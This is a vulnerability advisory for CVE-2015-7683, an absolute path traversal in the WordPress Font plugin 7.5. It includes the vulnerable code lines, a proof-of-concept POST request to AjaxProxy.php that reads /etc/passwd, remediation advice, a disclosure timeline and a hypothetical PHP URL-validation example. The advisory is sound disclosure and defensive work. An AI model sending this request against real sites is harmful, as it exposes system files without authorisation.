| Title | Published | Views | Reporter |
|---|---|---|---|
| WordPress Font 7.5 Path Traversal Vulnerability | 13 Oct 2015 00:00 | – | zdt |
| WordPress Font plugin path traversal vulnerability | 13 Oct 2015 00:00 | – | cnvd |
| CVE-2015-7683 | 16 Oct 2015 20:00 | – | cve |
| CVE-2015-7683 | 16 Oct 2015 20:00 | – | cvelist |
| EUVD-2015-7585 | 7 Oct 2025 00:30 | – | euvd |
| CVE-2015-7683 | 16 Oct 2015 20:59 | – | nvd |
| WordPress Font Plugin <= 7.5.0 - Absolute Path Traversal | 2 Oct 2015 00:00 | – | patchstack |
| Path traversal | 16 Oct 2015 20:59 | – | prion |
| CVE-2015-7683: Absolute Path Traversal in the Font WordPress Plugin | 26 Oct 2015 00:00 | – | securityvulns |
| Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) | 26 Oct 2015 00:00 | – | securityvulns |
Details
================
Software: Font
Version: 7.5
Homepage: https://wordpress.org/plugins/font/
CVE: CVE-2015-7683 (Pending)
CVSS: 6.3 (Medium; AV:N/AC:M/Au:S/C:C/I:N/A:N)
CWE: CWE-22
Description
================
An absolute path traversal vulnerability in Font 7.5 allows WordPress admins read access to system files such as /etc/passwd. Font is a WordPress plugin with over 40,000 active installs.
Vulnerability
================
The vulnerability is due to the unsanitized POST parameter 'url' being passed to file_get_contents() via file_get_contents2().
From font/Font.php:
139: $contents = $this->file_get_contents2($_POST['url'], array_merge($dataArr, $serializedArr));
. . .
515: function file_get_contents2($src, $postData = false) {
. . .
550: $fileContents = @file_get_contents($src, false, $context);
Proof of Concept
================
URL: http://localhost/wordpress/wp-content/plugins/font/AjaxProxy.php
POST data:
url=/etc/passwd&data%5Bblogurl%5D=http%3A%2F%2Flocalhost%2Fwordpress&data%5Bversion%5D=7.5&format=json&action=cross_domain_request
Remediation
================
Upgrade the plugin to version 7.5.1 or higher.
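An added example, not code from the plugin or from the 7.5.1 fix (which this advisory does not show): one way to validate a user-supplied URL before it reaches file_get_contents(), so that a bare path such as /etc/passwd is rejected. The function name validate_proxy_url and the allowlisted host are hypothetical.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical helper (not the plugin's code): accept only absolute
 * http(s) URLs whose host is on an explicit allowlist.
 * Returns the URL when it is acceptable, or null when it must be refused.
 */
function validate_proxy_url(string $url, array $allowedHosts): ?string
{
    $parts = parse_url($url);

    // parse_url() returns false on malformed input. A bare path such as
    // "/etc/passwd" parses to a 'path' only, with no scheme or host.
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }

    // file_get_contents() honours local paths and non-http stream
    // wrappers, so anything other than http/https is refused.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }

    // Only hosts the proxy is meant to talk to are accepted.
    if (!in_array(strtolower($parts['host']), $allowedHosts, true)) {
        return null;
    }

    return $url;
}

// Constructed sample inputs; api.example.com is a placeholder host.
$allowed = ['api.example.com'];
$samples = [
    '/etc/passwd',                          // value from the PoC above
    'file:///etc/passwd',                   // same path with a scheme
    'http://internal.example/status',       // host not on the allowlist
    'https://api.example.com/fonts?v=7.5',  // expected to pass
];

foreach ($samples as $s) {
    $ok = validate_proxy_url($s, $allowed) !== null;
    printf("%-40s %s\n", $s, $ok ? 'allowed' : 'rejected');
}
```

The check covers only the URL as submitted. HTTP redirects are followed by default, so the stream context's follow_location option would need to be disabled, or each hop revalidated.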
Timeline
================
2015-09-29: Discovered
2015-09-30: Contacted vendor via plugin support form
2015-10-01: Reported vulnerability to wordpress.org
2015-10-02: CVE-2015-7683 assigned
2015-10-04: Vendor releases version 7.5.1 - confirmed fixed
2015-10-12: Public Disclosure
References
================
[1] https://cwe.mitre.org/data/definitions/22.html
Discovered by
================
David Moore @grajagandev